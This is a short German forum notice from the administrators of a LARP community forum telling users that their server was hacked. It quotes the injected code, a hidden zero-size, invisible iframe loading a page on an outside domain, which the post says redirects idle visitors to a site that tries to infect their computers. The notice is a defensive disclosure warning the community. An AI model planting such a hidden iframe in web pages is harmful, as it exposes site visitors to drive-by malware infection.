Server von larp-ahr wurde angegriffen

  • Hallo liebe User,


    leider sind wir Opfer eines Hacks geworden.


    Der Code im Forum enthält ein Exploit
    <iframe src='http://esmtv.moon-galaxy.de/cache/templates/lib/?z' style='opacity: 0' width='0' height='0'></iframe>


    Wenn ich auf der Start-Seite bleibe und über 10 Minuten nichts mache, dann erfolgt eine Weiterleitung auf diese Webseite


    Es funktioniert nicht bei jeden anscheinend, tritt aber seit heute auf.


    Ich habe im Internet Ansätze gefunden, wie mit dem Problem umzugehen ist. Es müsste aber kurzfristig Zeit investiert werden, sollte das nicht möglich sein, müssen wir das Forum abschalten, da die Zielseite selber versucht, den Benutzerrechner mit schadhaften Code zu infizieren.


    Wir halten euch auf dem laufenden.


    Für das Team
    Malglin

    Leb wohl - alter Mann. Wir hatten es nicht immer einfach, aber ich vermisse dich furchtbar.